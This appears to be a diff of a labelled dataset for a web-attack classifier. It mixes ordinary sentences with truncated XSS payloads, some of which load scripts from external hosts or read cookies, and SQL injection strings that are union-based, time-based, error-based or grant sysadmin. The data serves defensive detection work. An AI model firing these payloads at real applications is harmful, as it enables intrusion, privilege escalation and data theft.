6537 = ,2,SQLi,19602 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5738 -"<tt onmousemove=""alert(1)"">test</tt>",1,XSS,8480 -"-2305' in boolean mode ) union all select 8147,814",2,SQLi,18438 -"<embed onmouseout=""alert(1)"">test</embed>",1,XSS,3165 -some,0,normal,23183 -<big id=x tabindex=1 onfocusin=alert(1)></big>,1,XSS,6764 -How and why did you select the subjects that you d,0,normal,26084 -"<;IMG "";"";"";>;<;SCRIPT>;alert("";XSS"";)<;/SCRIPT>;""",1,XSS,1658 -Fortnite servers are really bad today/tonight. Bee,0,normal,26500 -1' ) where 3579 = 3579 ( select ( case when ( 5451,2,SQLi,19095 -<input type=radio id=x onfocus=alert(1)>,1,XSS,7550 -<audio onpointerup=alert(1)>XSS</audio>,1,XSS,4267 -"Page down to the cookies section and select to "" e",0,normal,25791 -"-9749"" where 7083 = 7083 or make_set ( 7577 = 1182",2,SQLi,16807 -"{""id"":null,""name"":""Barn Owl""}",0,normal,27074 -<track id=x tabindex=1 onbeforedeactivate=alert(1),1,XSS,5317 -<button onTrackChange=javascript:alert(1)>,1,XSS,9674 -1 ) ) as wufr where 5239 = 5239 or 9643 = ( select,2,SQLi,19230 -"-2007' where 9157 = 9157 union all select 9157,915",2,SQLi,20451 -It is in select theaters in New York and Los Angel,0,normal,25964 -1' ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +c,2,SQLi,21629 +"-6236' ) ) ) or 1 group by concat ( 0x7171706a71, ",2,SQLi,22245 +"1 ) and 4241 = convert ( int, ( select char ( 113 ",2,SQLi,21441 +1'|| ( select 'ilkr' from dual where 9296 = 9296,2,SQLi,21841 +Insert form.,0,normal,23102 +<style>:target {color:red;}</style><button id=x st,1,XSS,4909 +"<figcaption draggable=""true"" ondragenter=""alert(1)",1,XSS,3725 +Catch The Book Of Henry in select theaters June 16,0,normal,26291 +1 or 7552 = ( select count ( * ) from rdb$fields a,2,SQLi,13125 +1'+ ( select mavu where 4276 = 4276 rlike sleep ( ,2,SQLi,12737 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3965 +Please select a wedding band.,0,normal,24389 +"<acronym onmousedown=""alert(1)"">test</acronym>",1,XSS,2673 +"-5513"" ) ) ) or 3440 = cast ( ( chr ( 113 ) ||chr ",2,SQLi,22069 +[test](javascript://%0d%0aprompt(1);com),1,XSS,9420 +1'+ ( select 'ycvl' where 8415 = 8415 or char ( 11,2,SQLi,18151 +<template onpointerenter=alert(1)>XSS</template>,1,XSS,4555 +"1' or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ",2,SQLi,16994 +"<nobr draggable=""true"" ondragenter=""alert(1)"">test",1,XSS,6012 +"-1287"" ) as bbzg where 1475 = 1475 union all selec",2,SQLi,17834 +-2715' ) ) or 6942 = 1636 and ( ( 'mqeq' = 'mqeq,2,SQLi,19604 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5740 +"<wbr onmousemove=""alert(1)"">test</wbr>",1,XSS,8482 +"-9405' ) union all select 8283,8283,8283,8283--",2,SQLi,18440 +<acronym id=x tabindex=1 onfocusin=alert(1)></acro,1,XSS,3167 +Please select a topic below to view the reports.,0,normal,25774 +"<u draggable=""true"" ondragend=""alert(1)"">test</u>",1,XSS,6766 +How did you select the poetry and writing for it?,0,normal,26081 +<;SCRIPT>;a=/XSS/,1,XSS,1659 +Guys are starting to seriously realize that League,0,normal,26497 +1' where 8360 = 8360 or 7427 = dbms_pipe.receive_m,2,SQLi,19097 +<map id=x tabindex=1 ondeactivate=alert(1)></map><,1,XSS,7552 +<style>:target {transform: rotate(180deg);}</style,1,XSS,4269 +PBteen: Save 20% – 303% off select bedroom furnitu,0,normal,25788 +"-1050"" ) ) or 4493 = utl_inaddr.get_host_address (",2,SQLi,16809 +"{""id"":null,""name"":""put""}",0,normal,27071 +"<img onmouseout=""alert(1)"">test</img>",1,XSS,5319 +<button onUndo=javascript:alert(1)>,1,XSS,9676 +"1' union all select null,null,null,null,null,null,",2,SQLi,19232 +"1%"" ) ) rlike ( select * from ( select ( sleep ( 5",2,SQLi,20453 +It is plain that if the good that is to be known i,0,normal,25961 +1' ) ) or 8315 = ( select count ( * ) from sysibm.,2,SQLi,21631 "&lt;DIV STYLE=\""background-image&#58;\0075\0072\00",1,XSS,1002 -"<nobr onkeypress=""alert(1)"" contenteditable>test</",1,XSS,4199 -"<menuitem onkeypress=""alert(1)"" contenteditable>te",1,XSS,2419 -"<embed onmouseover=""alert(1)"">test</embed>",1,XSS,3576 -1'+ ( select 'ueak' where 7329 = 7329 and 2853 = c,2,SQLi,20232 -"1%"" ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ",2,SQLi,17346 -&#0000060;,1,XSS,9773 -"<hgroup draggable=""true"" ondragend=""alert(1)"">test",1,XSS,3559 -"{""id"":null,""firstName"":""Jason"",""lastName"":""Khng"",""",0,normal,27189 -"1' ) ) union all select null,null,null,null,null,n",2,SQLi,12459 -<form onfocusout=alert(1) tabindex=1 id=x></form><,1,XSS,3855 -"<noframes onbeforecopy=""alert(1)"" contenteditable>",1,XSS,4888 -1 ) as pyjx where 9005 = 9005,2,SQLi,17142 -1%' ( select ( case when ( 5451 = 5451 ) then rege,2,SQLi,13059 -"To do this, open Picasa and go to 'Tools,' then 'F",0,normal,25273 -"<style>@keyframes x{}</style><tt style=""animation-",1,XSS,5314 -"1%"" ) ) and ( 3020 = 3020 ) *6703 and ( ( ""%"" = """,2,SQLi,18669 -1'|| ( select 'mosp' where 6085 = 6085,2,SQLi,16224 -Where's the SQL statement?,0,normal,23459 -"<datalist ondblclick=""alert(1)"">test</datalist>",1,XSS,4525 -"1"" ) where 6632 = 6632 or 2633 = dbms_pipe.receive",2,SQLi,13700 -"<article draggable=""true"" ondragleave=""alert(1)"">t",1,XSS,4828 -"-1043"" ) where 4207 = 4207 or 2724 in ( ( char ( 1",2,SQLi,22240 +<iframe id=x onfocusin=alert(1)>,1,XSS,4201 +<menuitem onpointerleave=alert(1)>XSS</menuitem>,1,XSS,2420 +<datalist id=x tabindex=1 onbeforedeactivate=alert,1,XSS,3578 +"1"" ) ) and char ( 120 ) ||char ( 106 ) ||char ( 11",2,SQLi,20234 +"1"" ) ) ) or 4240 = ( select 4240 from pg_sleep ( 5",2,SQLi,17348 +"JavaScript://%250Aalert?.(1)//'/*\'/*""/*\""/*`/*\`/",1,XSS,9775 +"<style>@keyframes x{}</style><progress style=""anim",1,XSS,3561 +"-2190' ) where 8890 = 8890 union all select 8890,8",2,SQLi,22237 +"-6940' ) union all select 3042,3042,3042,3042,3042",2,SQLi,12461 +<figure onpointermove=alert(1)>XSS</figure>,1,XSS,3857 +"<rt onkeyup=""alert(1)"" contenteditable>test</rt>",1,XSS,4890 +"1"" and 6414 = ( select count ( * ) from rdb$fields",2,SQLi,17144 +"select sleep ( 5 ) and ( ( ( ""%"" = """,2,SQLi,13061 +To ensure success with finer pitch requirements it,0,normal,25270 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5316 +exp ( ~ ( select * from ( select concat ( 0x717170,2,SQLi,18671 +-6215' ) or ( 8459 = 8459 ) *4906,2,SQLi,16226 +Where do you need help?,0,normal,23456 +"<dt draggable=""true"" ondrag=""alert(1)"">test</dt>",1,XSS,4527 +1 ) as xylu where 3338 = 3338 rlike ( select * fro,2,SQLi,13702 +<th id=x tabindex=1 onfocus=alert(1)></th>,1,XSS,4830 +1' ) ) and ( 3020 = 3020 ) *6703 and ( ( 'vvkd' li,2,SQLi,22238 "<SCRIPT/XSS SRC=""http://ha.ckers.org/xss.js""></SCR",1,XSS,808 -"<div onmouseover=""alert(1)"">test</div>",1,XSS,3908 -1%' ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ,2,SQLi,14334 -"-7725%' ) ) union all select 4559,4559,4559,4559,4",2,SQLi,22340 -"<small ondblclick=""alert(1)"">test</small>",1,XSS,7024 -<details id=x tabindex=1 onbeforeactivate=alert(1),1,XSS,1957 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10638 -<x on%78xx=1,1,XSS,9344 -"1', ( select 2* ( if ( ( select * from ( select co",2,SQLi,15162 -or 1 = 1/*,2,SQLi,11405 -Select your conclude.,0,normal,25003 -"<col oncopy=""alert(1)"" contenteditable>test</col>",1,XSS,2403 -<label id=x tabindex=1 onbeforedeactivate=alert(1),1,XSS,5185 -select ( case when ( 2768 = 8868 ) then 2768 else ,2,SQLi,17458 -"-8153' where 2436 = 2436 union all select 2436,243",2,SQLi,14699 -A Schumer spokesperson says in an email that he ha,0,normal,26431 -Students intending to spend a year in Europe will ,0,normal,25517 -ORDER BY 11#,2,SQLi,10284 -"-3971%' ) ) ) or elt ( 1032 = 1032,3623 ) and ( ( ",2,SQLi,12720 -<summary onpointermove=alert(1)>XSS</summary>,1,XSS,8096 -) or true--,2,SQLi,9891 -I need to decide where to go for a nature hike.,0,normal,23911 -"1"" ) ) as pqbs where 4409 = 4409",2,SQLi,18324 -"{""id"":null,""name"":""adventure parts""}",0,normal,27261 -"1"" or 2633 = dbms_pipe.receive_message ( chr ( 112",2,SQLi,17388 -"-9572%"" ) or 1570 = convert ( int, ( select char (",2,SQLi,15087 -1%' ) ) ) and ( select * from ( select ( sleep ( 5,2,SQLi,21055 -He selected a painting to hang on the wall.,0,normal,23699 -"<object onmouseover=""alert(1)"">test</object>",1,XSS,7567 -create user name identified by 'pass123',2,SQLi,11127 -"-5528' ) union all select 5153,5153,5153,5153,5153",2,SQLi,14720 -select,0,normal,26571 -"<td onmousemove=""alert(1)"">test</td>",1,XSS,5369 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6929 -<button onDragDrop=javascript:alert(1)>,1,XSS,9604 -Filter the search results.,0,normal,22580 -<style onfocusout=alert(1) tabindex=1 id=x></style,1,XSS,8902 -1 ) as zbha where 9700 = 9700 or 6979 = like ( 'ab,2,SQLi,22086 -"select * from users where id = 1 or ""{,"" = 1 or 1 ",2,SQLi,11796 -1 ) ) as xlww where 5844 = 5844,2,SQLi,17370 -"%' AND ELT(1337=1337,SLEEP(5)) AND '1337%'='1337",2,SQLi,11269 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7385 -Insert form.,0,normal,23102 -Select the best restaurant.,0,normal,24278 -"{""id"":null,""name"":""Beelzemon BM""}",0,normal,27139 -"{""id"":null,""name"":""unusual""}",0,normal,26758 -</title><script ~~~>confirm(1)</script ~~~>,1,XSS,9461 -<content onpointerout=alert(1)>XSS</content>,1,XSS,2463 -Where did you find that stylish boutique?,0,normal,23722 -"-7448 union all select 4072,4072#",2,SQLi,16653 -"1%"" ) ) ) or 8384 = like ( 'abcdefg',upper ( hex (",2,SQLi,19965 -1 order by 1--,2,SQLi,12943 -"select * from users where id = 1 or ""@ ) "" or 1 = ",2,SQLi,11709 -"1' ) union all select null,null,null,null#",2,SQLi,16456 -<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`8,1,XSS,9455 -Select your insist.,0,normal,24963 -"<th draggable=""true"" ondragleave=""alert(1)"">test</",1,XSS,6510 -"-2106"" or 4493 = utl_inaddr.get_host_address ( chr",2,SQLi,19206 -Extra 10% off select items with code SUPERSAVER (t,0,normal,26203 +"<strike oncut=""alert(1)"" contenteditable>test</str",1,XSS,3910 +1 where 8398 = 8398,2,SQLi,14336 +Merge the puzzle pieces.,0,normal,22610 +"<basefont draggable=""true"" ondrag=""alert(1)"">test<",1,XSS,7026 +"<dd draggable=""true"" ondragstart=""alert(1)"">test</",1,XSS,1958 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10640 +<x oncontextmenu=alert(1)>right click this!,1,XSS,9346 +"-7574%"" ) or 5023 = ctxsys.drithsx.sn ( 5023, ( ch",2,SQLi,15164 +select * from users where id = 1 <@&@ union select,2,SQLi,11407 +Select your determine.,0,normal,25000 +"<main oncontextmenu=""alert(1)"">test</main>",1,XSS,2404 +"<section draggable=""true"" ondragenter=""alert(1)"">t",1,XSS,5187 +1' ) ) as stnn where 6160 = 6160 and 8881 = 7347--,2,SQLi,17460 +"1"" ) as tecq where 4817 = 4817 and 8189 = ( select",2,SQLi,14701 +A user will see a little dot through their headset,0,normal,26428 +Such a select committee must focus on two critical,0,normal,25514 +ORDER BY 13#,2,SQLi,10286 +select ( case when ( 3863 = 1151 ) then 3863 else ,2,SQLi,12722 +<textarea onselect=alert(1) autofocus>XSS</textare,1,XSS,8098 +) or ('x')=('x,2,SQLi,9893 +I need to select the right music for the occasion.,0,normal,23908 +"-9015%"" ) union all select 6948,6948--",2,SQLi,18326 +I need to decide where to go for a nature walk.,0,normal,23951 +"1' in boolean mode ) or 8384 = like ( 'abcdefg',up",2,SQLi,17390 +"1%"" ) ) or extractvalue ( 1297,concat ( 0x5c,0x717",2,SQLi,15089 +-7246'|| ( select 'qchp' from dual where 8317 = 83,2,SQLi,21057 +I'm considering where to go for a day trip.,0,normal,23696 +<style>:target {color: red;}</style><data id=x sty,1,XSS,7569 +"exec sp_addsrvrolemember 'name' , 'sysadmin'",2,SQLi,11129 +"1', ( cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 1",2,SQLi,14722 +select,0,normal,26568 +"<basefont onkeyup=""alert(1)"" contenteditable>test<",1,XSS,5371 +"<p draggable=""true"" ondragend=""alert(1)"">test</p>",1,XSS,6931 +<button onDragEnter=javascript:alert(1)>,1,XSS,9606 +select,0,normal,26593 +"<footer draggable=""true"" ondragend=""alert(1)"">test",1,XSS,8904 +1'|| ( select 'iwlj' where 8704 = 8704 and ( selec,2,SQLi,22084 +"select * from users where id = 1 or 1#""? union sel",2,SQLi,11798 +1' ) or ( select * from ( select ( sleep ( 5 ) ) ),2,SQLi,17372 +") AND ELT(1337=1337,SLEEP(5)) AND (""1337""=""1337",2,SQLi,11271 +"<style>@keyframes x{}</style><sup style=""animation",1,XSS,7387 +Delete app.,0,normal,23099 +Select the correct option.,0,normal,24275 +"{""id"":null,""firstName"":""Buddhika"",""lastName"":""Hong",0,normal,27428 +"{""id"":null,""name"":""dear""}",0,normal,26755 +</title><</script/script><script>eval('\\u'+'0061',1,XSS,9463 +<param id=x tabindex=1 onfocusin=alert(1)></param>,1,XSS,2464 +Determine values where needed.,0,normal,23362 +select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,16655 +1 where 6365 = 6365,2,SQLi,19967 +"1 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c )",2,SQLi,12945 +) or sleep ( __TIME__ ) = ',2,SQLi,11711 +1' ) as tvqn where 2967 = 2967,2,SQLi,16458 +<svg id=x;onload=alert(1)>,1,XSS,9457 +Select your confirm.,0,normal,24960 +<details id=x tabindex=1 ondeactivate=alert(1)></d,1,XSS,6512 +"-4707' union all select 4414,4414,4414,4414,4414,4",2,SQLi,19208 +Extra 5% off Select HP Gaming PCs w/ code: 5GAMER,0,normal,26200 `'><script>\x0Bjavascript:alert(1)</script>,1,XSS,590 -case,0,normal,23144 -1' ) ) ) order by 1#,2,SQLi,13137 -1 and ( 3020 = 3020 ) *6703-- zsnl,2,SQLi,16550 -"<style>:target {color:red;}</style><q id=x style=""",1,XSS,8849 -"<time onmousedown=""alert(1)"">test</time>",1,XSS,4625 -1 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||cha,2,SQLi,20143 -<var id=x tabindex=1 onbeforeactivate=alert(1)></v,1,XSS,6846 -1' ) where 9544 = 9544 or exp ( ~ ( select * from ,2,SQLi,14344 -"-4379' union all select 1648,1648,1648,1648,1648,1",2,SQLi,18413 -))%20waitfor%20delay%20'0:0:20'%20/*,2,SQLi,10851 -"<frame onbeforecut=""alert(1)"" contenteditable>test",1,XSS,8870 -Select your favorite song to play.,0,normal,22952 -[a](javascript:this;alert(1)),1,XSS,9425 -"<data oncontextmenu=""alert(1)"">test</data>",1,XSS,5455 -select current_database();,2,SQLi,22501 -&lt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);//&lt;&lt,1,XSS,1450 -1' ) as idqc where 5288 = 5288 and elt ( 1210 = 12,2,SQLi,22405 -"-9315' ) ) ) union all select 5057,5057,5057,5057,",2,SQLi,15850 -"; if not ( substring ( ( select @@version ) ,24,1 ",2,SQLi,11455 -Plant a lush garden.,0,normal,22662 -"1"" where 4688 = 4688 or 8466 = benchmark ( 5000000",2,SQLi,18817 -Where's the hairdresser?,0,normal,23642 -1' and sleep ( 5 ) #,2,SQLi,21032 -"1"" ) ) ) and char ( 109 ) ||char ( 79 ) ||char ( 7",2,SQLi,17281 -><script+src=https://twitter.com/statuses/user_tim,1,XSS,9804 -"<;DIV STYLE="";background-image: url(&;#1;javascrip",1,XSS,1588 -"<plaintext onkeypress=""alert(1)"" contenteditable>t",1,XSS,6687 -1'+ ( select 'jtvq' where 8288 = 8288 and ( select,2,SQLi,13559 -"-3472' or 1570 = convert ( int, ( select char ( 11",2,SQLi,18104 -"1%"" ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ",2,SQLi,20191 -<xmp onpointerleave=alert(1)>XSS</xmp>,1,XSS,8807 -Select your favorite dish.,0,normal,24282 -<center id=x tabindex=1 onfocus=alert(1)></center>,1,XSS,3962 -"<canvas onmousedown=""alert(1)"">test</canvas>",1,XSS,8924 -<article onpointerup=alert(1)>XSS</article>,1,XSS,6079 -"select sleep ( 5 ) and ""oivc"" like ""oivc",2,SQLi,17275 -#ERROR!,2,SQLi,10957 -Customers can select what they want delivered on a,0,normal,26254 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4007 -"<wbr onkeypress=""alert(1)"" contenteditable>test</w",1,XSS,4940 -Select bloom.,0,normal,24675 -1' ) or 5286 = ( select count ( * ) from all_users,2,SQLi,18396 -"<small oncopy=""alert(1)"" contenteditable>test</sma",1,XSS,5899 -1' ) ) as tfub where 3461 = 3461 or 7427 = dbms_pi,2,SQLi,14366 -Select a new hobby to explore.,0,normal,24036 -1'+ ( select tdkt where 4535 = 4535,2,SQLi,14012 -"1%"" ) ) ) or ( select * from ( select ( sleep ( 5 ",2,SQLi,16969 -AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11461 -1'+ ( select 'xqpe' where 4020 = 4020 union all se,2,SQLi,20317 -1' ) ) or 6793 = ( select 6793 from pg_sleep ( 5 ),2,SQLi,13158 -><img src=x onerror=javascript:alert('1')>,1,XSS,1261 -"-5832"" ) or 1650 = 9011--",2,SQLi,20923 -1' and sleep ( 5 ),2,SQLi,14392 +sum,0,normal,23141 +1 ) ) ) and char ( 120 ) ||char ( 106 ) ||char ( 1,2,SQLi,13139 +-2495 ) ) as hudw where 4197 = 4197 or 4747 = dbms,2,SQLi,16552 +"<caption draggable=""true"" ondragenter=""alert(1)"">t",1,XSS,8851 +<IMG SRC=javascript:alert(&quot;&quot;)>,1,XSS,4627 +"-7271' ) ) ) or make_set ( 9354 = 9354,7185 ) and ",2,SQLi,20145 +<rb id=x tabindex=1 onactivate=alert(1)></rb>,1,XSS,6848 +"( select 1 from generate_series ( 9352,9352,case w",2,SQLi,14346 +1' or ( select * from ( select ( sleep ( 5 ) ) ) y,2,SQLi,18415 +"""))%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,10853 +<hgroup onblur=alert(1) tabindex=1 id=x></hgroup><,1,XSS,8872 +Merge the puzzle pieces to complete it.,0,normal,22949 +[a](javascript&#58this;alert(1&#41;),1,XSS,9427 +<blink id=x tabindex=1 onbeforedeactivate=alert(1),1,XSS,5457 +#ERROR!,2,SQLi,22522 +&lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(,1,XSS,1451 +Flint residents didn't fare any better with the Se,0,normal,26184 +1 ) ) ) rlike ( select ( case when ( 7689 = 7689 ),2,SQLi,15852 +"select * from users where id = 1 or 1#""{ union sel",2,SQLi,11457 +Select point.,0,normal,24664 +1%' ) ) ) and sleep ( 5 ) and ( ( ( '%' = ',2,SQLi,18819 +Where's the weight loss clinic?,0,normal,23639 +1 ) ) ) ( select ( case when ( 4587 = 4587 ) then ,2,SQLi,21034 +1'+ ( select 'vidl' where 9445 = 9445 and 5498 = 5,2,SQLi,17283 +><script+src=https://www.sharethis.com/get-publish,1,XSS,9806 +"<;DIV STYLE="";width: expression(alert(';XSS';));"";",1,XSS,1589 +<bdi id=x tabindex=1 onbeforedeactivate=alert(1)><,1,XSS,6689 +1'+ ( select 'uijv' where 7279 = 7279 and 8312 = d,2,SQLi,13561 +"1"" ) as yphz where 8174 = 8174 union all select nu",2,SQLi,18106 +"1%' and updatexml ( 3393,concat ( 0x2e,0x7171706a7",2,SQLi,20193 +<dt onpointerup=alert(1)>XSS</dt>,1,XSS,8809 +"{""id"":null,""firstName"":""Eddie"",""lastName"":""Khoo"",""",0,normal,27519 +<iframe id=x tabindex=1 onbeforeactivate=alert(1)>,1,XSS,3964 +<h1 id=x tabindex=1 onbeforeactivate=alert(1)></h1,1,XSS,8926 +<textarea onbeforecopy=alert(1) autofocus>XSS</tex,1,XSS,6081 +1 ) as eryo where 2531 = 2531 rlike sleep ( 5 ) --,2,SQLi,17277 +"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20",2,SQLi,10959 +DADA Daily snacks are available online and in sele,0,normal,26251 +"<menu draggable=""true"" ondrag=""alert(1)"">test</men",1,XSS,4009 +<tt onpointerdown=alert(1)>XSS</tt>,1,XSS,4942 +Select fall.,0,normal,24672 +waitfor delay '0:0:5' and ( ( ( 'ywnm' = 'ywnm,2,SQLi,18398 +"<tbody oncontextmenu=""alert(1)"">test</tbody>",1,XSS,5901 +"1"" ) union all select null,null,null,null,null,nul",2,SQLi,14368 +Select a scent for your sanctuary.,0,normal,24033 +"1%"" ) ) or 9643 = ( select count ( * ) from domain",2,SQLi,14014 +-3748' where 9292 = 9292 or 3337 = 2859#,2,SQLi,16971 +select * from users where id = 1 or 1 = 1 -- 1,2,SQLi,11463 +"1' ) ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and (",2,SQLi,20319 +"1"" ) ) as iubt where 8179 = 8179 or 9643 = ( selec",2,SQLi,13160 +"><img src=x onerror=javascript:alert(1"")>",1,XSS,1262 +"1 ) where 5615 = 5615 and row ( 6237,7469 ) > ( se",2,SQLi,20925 +"1%"" ) ) and ( select 9067 from ( select count ( * ",2,SQLi,14394 <script>,1,XSS,311 -)alert(1);//,1,XSS,1717 -"<style>@keyframes x{}</style><address style=""anima",1,XSS,2053 -1%' ) ) rlike ( select ( case when ( 6094 = 7893 ),2,SQLi,20672 -<svg><mark onload=alert(1)></mark>,1,XSS,4669 -<iframe onpointerdown=alert(1)>XSS</iframe>,1,XSS,4299 -"<picture draggable=""true"" ondragend=""alert(1)"">tes",1,XSS,3784 +<IMG SRC='javascript:alert('XSS');'>,1,XSS,1718 +<a id=x tabindex=1 ondeactivate=alert(1)></a><inpu,1,XSS,2054 +1' ) where 5540 = 5540 waitfor delay '0:0:5'--,2,SQLi,20674 +<sup onpointerout=alert(1)>XSS</sup>,1,XSS,4671 +"<bgsound oncut=""alert(1)"" contenteditable>test</bg",1,XSS,4301 +"<small oncontextmenu=""alert(1)"">test</small>",1,XSS,3786 "&lt;STYLE TYPE=\""text/javascript\""&gt;alert('XSS')",1,XSS,1009 -<style>@keyframes slidein {}</style><object style=,1,XSS,7348 -1 ) where 8616 = 8616 and 2006 = 2006,2,SQLi,20825 -SLEEP(5)=,2,SQLi,10378 -Select a plant for your garden.,0,normal,24126 -?playerready=alert(document.cookie),1,XSS,9879 -"1"" ) ) as iubt where 8179 = 8179 or 9643 = ( selec",2,SQLi,13160 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2774 -1' ) and 6240 = ( 'qqpjq'|| ( select case 6240 whe,2,SQLi,13027 -1 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||c,2,SQLi,20444 -1' ) ) as dcen where 5852 = 5852 or ( select * fro,2,SQLi,12949 -1 where 7932 = 7932 or exp ( ~ ( select * from ( s,2,SQLi,16475 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,1988 -Where's the cabin?,0,normal,23554 -"<h1 onkeydown=""alert(1)"" contenteditable>test</h1>",1,XSS,7280 -"<acronym onmousedown=""alert(1)"">test</acronym>",1,XSS,2673 -"-3270"" where 2144 = 2144 or 2724 in ( ( char ( 113",2,SQLi,16261 -<form><button formaction=javascript:alert(1)>click,1,XSS,9176 --2733' ) ) ) or 4144 = ( select upper ( xmltype ( ,2,SQLi,17359 -Select a background color by clicking on the color,0,normal,25665 -1' ) ) and 6537 = dbms_pipe.receive_message ( chr ,2,SQLi,19310 -"<img src=x onerror=""&#0000106&#0000097&#0000118&#0",1,XSS,250 -"<frame draggable=""true"" ondragstart=""alert(1)"">tes",1,XSS,8186 -"<header ondblclick=""alert(1)"">test</header>",1,XSS,5885 -"select benchmark ( 5000000,md5 ( 0x714e4153 ) ) #",2,SQLi,18726 -Select the perfect honeymoon destination.,0,normal,24394 -Select a travel destination for a vacation.,0,normal,24122 -"<img oncontextmenu=""alert(1)"">test</img>",1,XSS,6590 -1'+ ( select llcl where 8188 = 8188 and 2716 = ( s,2,SQLi,13781 -1' ) ) as cbka where 3176 = 3176 and 8407 = ( sele,2,SQLi,22063 -<frameset onload=javascript:alert(1)>,1,XSS,628 -For graphical representation we select units of le,0,normal,26178 -"-2131"" or 2724 in ( ( char ( 113 ) +char ( 113 ) +",2,SQLi,13273 -Select your dream wedding invitations.,0,normal,24376 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,4766 -"{""id"":null,""firstName"":""Krish"",""lastName"":""Muthuku",0,normal,27077 -"The Industrial Select Sector SPDR Fund, which trac",0,normal,25425 -"1"" where 4213 = 4213 and 8407 = ( select count ( *",2,SQLi,16513 -Select haggle.,0,normal,24765 -Update image.,0,normal,23081 -"1"" ) as hfgk where 1100 = 1100 or char ( 119 ) ||c",2,SQLi,20567 -"1%"" ) ) waitfor delay '0:0:5' and ( ( ""%"" = """,2,SQLi,13783 -"-7635"" union all select 1284,1284,1284,1284,1284,1",2,SQLi,12428 -"<option onmouseout=""alert(1)"">test</option>",1,XSS,6996 -Where's the schema defined?,0,normal,23398 -1' ) ) and 3707 = ( select count ( * ) from sysibm,2,SQLi,18783 -<element onpointerdown=alert(1)>XSS</element>,1,XSS,6306 -Select businesses in the area will also be offerin,0,normal,25641 -Select your dream house.,0,normal,24271 -Aggregate data where possible.,0,normal,23446 -1 ) where 5774 = 5774,2,SQLi,12393 -"-5210"" ) where 7176 = 7176 or 6872 = 6872--",2,SQLi,17571 -This subject had been handed over in 18 9 3 to a r,0,normal,25295 -"-6419 union all select 7008,7008,7008,7008,7008--",2,SQLi,15473 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHA",2,SQLi,10704 -"{""id"":null,""name"":""Excadrill""}",0,normal,27233 -1' ) and 5556 = ( select count ( * ) from all_user,2,SQLi,21699 -<isindex action=javascript:alert(1) type=submit va,1,XSS,9221 -<rp onpointerleave=alert(1)>XSS</rp>,1,XSS,4248 -"{""id"":null,""firstName"":""Davio"",""lastName"":""Hong"",""",0,normal,27009 -"AND ELT(1337=1337,SLEEP(5)) AND 1337""=""1337",2,SQLi,11274 -"<div id=""119""><iframe src=""view-source:http://www.",1,XSS,9108 -"javascript:""/*`/*\""/*'/*</stYle/</titLe/</teXtarEa",1,XSS,9498 -"1%"" ) ) union all select null,null,null,null#",2,SQLi,17481 -RLIKE SLEEP(5) OR '1337'='1337,2,SQLi,11242 -><img src=x onerror=javascript:alert(`A`)>,1,XSS,1274 -"<tfoot onbeforecut=""alert(1)"" contenteditable>test",1,XSS,5699 -"<xmp draggable=""true"" ondragenter=""alert(1)"">test<",1,XSS,7679 -"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NUL",2,SQLi,10989 -<button onCellChange=javascript:alert(1)>,1,XSS,9591 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3359 -1'+ ( select sshu where 3442 = 3442 and ( select 2,2,SQLi,16568 -1'+ ( select nsri where 1202 = 1202 and 4595 = 459,2,SQLi,22230 -"{""id"":null,""name"":""Hammerhead Shark""}",0,normal,27259 -Select the perfect lens for photography.,0,normal,24081 -"1"" ) ) and ( 7467 = 7962 ) *7962 and ( ( ""nhld"" = ",2,SQLi,15236 -"<select onbeforecopy=""alert(1)"" contenteditable>te",1,XSS,6514 -"1"" and updatexml ( 3393,concat ( 0x2e,0x7171706a71",2,SQLi,16080 -"<multicol onmousemove=""alert(1)"">test</multicol>",1,XSS,4568 -1' in boolean mode ) waitfor delay '0:0:5'#,2,SQLi,13256 -""")%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,10849 -1%' ) rlike ( select * from ( select ( sleep ( 5 ),2,SQLi,19248 -Let's discuss where to go for our next adventure.,0,normal,23970 -<frameset onpointerup=alert(1)>XSS</frameset>,1,XSS,1962 -"<menuitem draggable=""true"" ondragenter=""alert(1)"">",1,XSS,4993 -"<hgroup oncut=""alert(1)"" contenteditable>test</hgr",1,XSS,4892 -"1%"" ) ) ) and 3754 = ( select upper ( xmltype ( ch",2,SQLi,14331 -"{""id"":null,""firstName"":""Hong"",""lastName"":""Lee"",""sp",0,normal,26911 -"<applet onmouseenter=""alert(1)"">test</applet>",1,XSS,6227 -They always select carefully.,0,normal,24424 -Join tables where necessary.,0,normal,23308 -<sVg><scRipt >alert&lpar;1&rpar; {Opera},1,XSS,1252 -<noframes id=x tabindex=1 ondeactivate=alert(1)></,1,XSS,3177 -<style>:target {transform: rotate(180deg);}</style,1,XSS,3360 +<ins id=x tabindex=1 onfocusin=alert(1)></ins>,1,XSS,7350 +"select benchmark ( 